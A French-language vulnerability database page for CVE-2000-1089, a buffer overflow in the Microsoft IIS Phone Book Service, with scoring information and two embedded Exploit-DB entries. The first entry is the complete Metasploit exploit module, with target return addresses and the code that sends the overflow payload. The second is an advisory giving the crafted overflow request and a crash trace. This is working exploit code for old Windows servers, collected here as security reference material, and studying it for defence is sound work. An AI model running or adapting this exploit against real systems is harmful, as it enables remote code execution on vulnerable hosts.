CVE-2000-1089 : Détail

CVE-2000-1089

96.78%V3
Network
2001-01-22
04h00 +00:00
2005-11-02
09h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in Microsoft Phone Book Service allows local users to execute arbitrary commands, aka the "Phone Book Service Buffer Overflow" vulnerability.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 16357

Date de publication : 2010-04-29 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: ms00_094_pbserver.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft IIS Phone Book Service Overflow', 'Description' => %q{ This is an exploit for the Phone Book Service /pbserver/pbserver.dll described in MS00-094. By sending an overly long URL argument for phone book updates, it is possible to overwrite the stack. This module has only been tested against Windows 2000 SP1. }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2000-1089' ], [ 'OSVDB', '463' ], [ 'BID', '2048' ], [ 'MSB', 'MS00-094' ], ], 'Privileged' => false, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 896, 'BadChars' => "\x00\x0a\x0d\x20%&=?", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ ['Windows 2000 SP1', { 'Ret' => 0x77e8898b }], # jmp esp kernel32.dll ['Windows 2000 SP0', { 'Ret' => 0x77ea162b }], # call esp kernel32.dll ['Windows NT SP6', { 'Ret' => 0x77f32836 }], # jmp esp kernel32.dll ], 'DisclosureDate' => 'Dec 04 2000', 'DefaultTarget' => 0)) register_options( [ OptString.new('URL', [ true, "The path to pbserver.dll", "/pbserver/pbserver.dll" ]), ], self.class) end def check print_status("Requesting the vulnerable ISAPI path...") res = send_request_raw({ 'uri' => datastore['URL'] }, 5) if (res and res.code == 400) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit print_status("Sending overflow...") res = send_request_raw({ 'uri' => datastore['URL'] + '?&&&&&&pb=' + payload.encoded + [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912) }, 5) handler end end
Exploit Database EDB-ID : 20460

Date de publication : 2000-12-03 23h00 +00:00
Auteur : Alberto Solino
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/2048/info The Phone Book Service is an optional component that ships with the NT 4 Option Pack and Windows 2000. It is not installed by default. A buffer overflow vulnerability was discovered in the URL processing routines of the Phone Book Service requests on IIS 4 and IIS 5. If exploited, this vulnerability allows an attacker to execute arbitrary code and obtain a remote command shell with those privileges of the IUSR_machinename account (IIS 4) or the IWAM_machinename account (IIS 5). The Phone Book server services requests using the Internet Information Services 5.0 with URIs such as http://hostname/pbserver/ According to Microsoft's documentation a DLL (PBSERVER.DLL) is exported and the services can be used making requests with the following format: http://hostname/pbserver/pbserver.dll?osarch=&ostype=&osver=&cmver=&lcid=&pb ver=&pb=<STRING=db name> In the DLL checks the total lenght to ensure that request does not exceed 1024 bytes, however it is possible to overflow a local variable of fixed length in the DLL by sending a request with the following form: GET /pbserver/pbserver.dll?&&&&&&pb=AAAAAA... (less than 980 chars) HTTP/1.0\n\n The result is an exception reported in the Event log with source WAM like the following: The HTTP server encountered an unhandled exception while processing the ISAPI Application ' + 0x41414143 + 0x41414139 pbserver!HttpExtensionProc + 0x1C wam!DllGetClassObject + 0x808 RPCRT4!NdrServerInitialize + 0x4DB RPCRT4!NdrStubCall2 + 0x586 RPCRT4!CStdStubBuffer_Invoke + 0xC1 ole32!StgGetIFillLockBytesOnFile + 0x116EC ole32!StgGetIFillLockBytesOnFile + 0x12415 ole32!DcomChannelSetHResult + 0xDF0 ole32!DcomChannelSetHResult + 0xD35 ole32!StgGetIFillLockBytesOnFile + 0x122AD ole32!StgGetIFillLockBytesOnFile + 0x1210A ole32!StgGetIFillLockBytesOnFile + 0x11E22 RPCRT4!NdrServerInitialize + 0x745 RPCRT4!NdrServerInitialize + 0x652 RPCRT4!NdrServerInitialize + 0x578 RPCRT4!RpcSmDestroyClientContext + 0x9E RPCRT4!NdrConformantArrayFree + 0x8A5 RPCRT4!NdrConformantArrayFree + 0x3FC RPCRT4!RpcBindingSetOption + 0x395 RPCRT4!RpcBindingSetOption + 0x18E RPCRT4!RpcBindingSetOption + 0x4F8 KERNEL32!CreateFileA + 0x11B For additional information specific to this message please visit the Microsoft Online Support site located at: http://www.microsoft.com/contentredirect.asp. By sending a carefully crafted HTTP request an attacker can bypass the total length check and overflow a local variable in PBSERVER.DLL allowing the execution of arbitrary code as user GUEST on the vulnerable machine.

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_nt >> Version 4.0

Références

http://www.securityfocus.com/bid/2048
Tags : vdb-entry, x_refsource_BID
http://www.stake.com/research/advisories/2000/a120400-1.txt
Tags : vendor-advisory, x_refsource_ATSTAKE